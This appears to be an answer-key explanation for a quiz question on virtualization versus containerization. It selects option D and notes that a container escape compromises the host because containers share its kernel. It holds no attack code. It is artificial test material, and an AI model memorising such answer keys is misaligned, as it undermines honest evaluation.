D. Virtualization enables multiple operating systems to run on a single physical machine, while containerization does not. The primary difference between containerization and virtualization is that virtualization allows multiple virtual machines to run different operating systems on a single physical machine, while containerization allows multiple containers to run on a single operating system instance. Because containers share the host kernel, a container escape compromises the host and every other container on it, so containers offer weaker isolation than virtual machines, which is why option A is incorrect.